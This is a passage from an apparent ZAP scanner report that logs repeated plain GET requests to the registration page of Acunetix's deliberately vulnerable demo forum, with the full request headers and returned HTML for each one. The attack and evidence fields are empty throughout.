malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do 